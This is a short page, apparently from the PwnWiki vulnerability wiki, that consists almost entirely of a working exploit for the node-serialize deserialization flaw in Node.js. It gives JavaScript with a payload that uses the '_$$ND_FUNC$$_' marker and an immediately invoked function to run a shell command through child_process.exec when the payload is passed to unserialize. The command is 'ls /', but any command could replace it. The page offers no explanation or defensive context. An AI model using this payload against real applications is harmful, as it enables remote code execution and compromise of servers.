免费、自由、人人可编辑的漏洞库
,
EXP
var serialize = require('node-serialize');
var payload = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}';
serialize.unserialize(payload);
免费、自由、人人可编辑的漏洞库--PwnWiki.com
